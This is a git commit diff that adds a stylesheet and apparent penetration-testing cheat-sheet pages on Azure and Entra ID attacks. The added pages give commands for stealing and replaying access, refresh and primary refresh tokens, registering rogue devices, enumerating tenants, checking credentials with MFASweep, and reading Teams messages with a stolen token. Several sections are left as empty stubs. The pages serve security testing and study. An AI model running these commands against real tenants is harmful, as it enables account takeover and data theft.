PATT Migration - v0.2

2023-11-17 21:29:33 +01:00 · 2023-11-17 21:29:33 +01:00 · e04303cbfe
parent 53dd66c6e3
commit e04303cbfe
13 changed files with 168 additions and 6 deletions
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@ -5,9 +5,7 @@ on:
    branches:
      - master 
      - main
-  # At minute 0 past every 6th hour
-  schedule:
-  - cron: "0 */6 * * *"
+
 jobs:
  deploy:
    runs-on: ubuntu-latest
--- a/assets/banner.png
+++ b/assets/banner.png
--- a/custom.css
+++ b/custom.css
@ -0,0 +1,13 @@
+.md-header{
+    background-color: #841F36;
+}
+
+@media screen and (min-width: 790px) {
+    .md-grid{
+        max-width: 100%;
+    }
+
+    .md-sidebar{
+        width: auto;
+    } 
+}
--- a/docs/cloud/aws/Cloud
+++ b/docs/cloud/aws/Cloud
--- a/docs/cloud/aws/todo.md
+++ b/docs/cloud/aws/todo.md
@ -1 +0,0 @@
-TODO
--- a/docs/cloud/azure/access-and-token.md
+++ b/docs/cloud/azure/access-and-token.md
@ -1 +0,0 @@
-TEST B
--- a/docs/cloud/azure/azure-access-and-token.md
+++ b/docs/cloud/azure/azure-access-and-token.md
@ -0,0 +1,76 @@
+# Microsoft Entra ID / Azure Active Directory
+
+
+## Access Token
+
+Decode access tokens: [jwt.ms](https://jwt.ms/)
+
+* Use token
+    ```ps1
+    # use the jwt
+    $token = "eyJ0eXAiO..."
+    $secure = $token | ConvertTo-SecureString -AsPlainText -Force
+    Connect-MgGraph -AccessToken $secure
+
+    # whoami
+    Get-MgContext
+    Disconnect-MgGraph
+    ```
+
+
+## Refresh Token
+
+* Requesting a token using credentials
+    ```ps1
+    TODO
+    ```
+* 
+
+
+### Get a Refresh Token from ESTSAuth Cookie
+
+`ESTSAuthPersistent` is only useful when a CA policy actually grants a persistent session. Otherwise, you should use `ESTSAuth`.
+
+```ps1
+TokenTacticsV2> Get-AzureTokenFromESTSCookie -ESTSAuthCookie "0.AS8"
+TokenTacticsV2> Get-AzureTokenFromESTSCookie -Client MSTeams -ESTSAuthCookie "0.AbcAp.."
+```
+
+
+### Get a Refresh Token from Office process
+
+* [trustedsec/CS-Remote-OPs-BOF](https://github.com/trustedsec/CS-Remote-OPs-BOF)
+```ps1
+load bofloader
+execute_bof /opt/CS-Remote-OPs-BOF/Remote/office_tokens/office_tokens.x64.o --format-string i  7324
+```
+
+
+## Primary Refresh Token
+
+* Use PRT token
+    ```ps1
+    roadtx browserprtauth -prt roadtx.prt -url http://www.office.com
+    ```
+
+
+### Extract PRT on Device with TPM
+
+* No method known to date.
+
+
+### Generate a PRT by registering a device
+
+```ps1
+roadtx interactiveauth -u user.lastname@domain.local -p password123 -r devicereg
+roadtx device -n devicename
+roadtx prt -u user.lastname@domain.local -p password123 –-key-pem devicename.key –-cert-pem devicename.pem
+roadtx prtenrich –prt roadtx.prt
+roadtx prt -u user.lastname@domain.local -p password123 –-key-pem devicename.key –-cert-pem devicename.pem -r 0.AVAApQL<snip>
+```
+
+
+## References
+
+* [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0)
+* [Microsoft 365 Developer Program](https://developer.microsoft.com/en-us/microsoft-365/dev-program)
--- a/docs/cloud/azure/azure-devices-users-services.md
+++ b/docs/cloud/azure/azure-devices-users-services.md
@ -0,0 +1,22 @@
+# IAM
+
+> Root Management Group (Tenant) > Management Group > Subscription > Resource Group > Resource
+
+* Users
+* Devices
+* Service Principals (Application and Managed Identities)
+
+## Users
+
+```ps1
+```
+
+
+## Devices
+
+### Join Devices
+
+### Register Devices
+
+
+# Service Principals
--- a/docs/cloud/azure/azure-enumeration.md
+++ b/docs/cloud/azure/azure-enumeration.md
@ -0,0 +1,34 @@
+# OSINT AAD - Recon Domains
+
+Extract openly available information for the given tenant: https://aadinternals.com/osint/
+
+```ps1
+Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
+Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
+```
+
+# Azure AD - Collectors
+
+* roadrecon
+    ```ps1
+    roadrecon auth --access-token eyJ0eXA...
+    roadrecon gather
+    ```
+* AzureHound
+    ```ps1
+    ./azurehound -r REFRESH_TOKEN list --tenant domain.local -o output.json
+    ```
+
+
+# Azure AD - Conditionnal Access
+
+Enumerate Conditionnal Access Policies: `roadrecon plugin policies`
+
+# Azure AD - MFA
+
+* [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services
+```ps1
+Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020
+Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Recon -IncludeADFS
+```
+
--- a/docs/cloud/azure/azure-phishing.md
+++ b/docs/cloud/azure/azure-phishing.md
@ -0,0 +1,4 @@
+# Illicit Consent Grant
+
+# Device Code Phishing
+
--- a/docs/cloud/azure/azure-services.md
+++ b/docs/cloud/azure/azure-services.md
@ -0,0 +1,15 @@
+# Azure Runbook
+
+Runbook must be SAVED and PUBLISHED before running it.
+
+
+
+
+# Office 365
+
+## Extracting Microsoft Teams Messages
+
+```ps1
+TokenTacticsV2> RefreshTo-MSTeamsToken -domain domain.local
+AADInternals> Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token | Format-Table id,content,deletiontime,*type*,DisplayName
+```
--- a/docs/cloud/azure/enumeration.md
+++ b/docs/cloud/azure/enumeration.md
@ -1 +0,0 @@
-# TEST A
--- a/mkdocs.yml
+++ b/mkdocs.yml
@ -23,6 +23,9 @@ theme:
    - toc.integrate
    - navigation.top

+extra_css:
+    - custom.css
+
 markdown_extensions:
  - def_list
  - pymdownx.tasklist: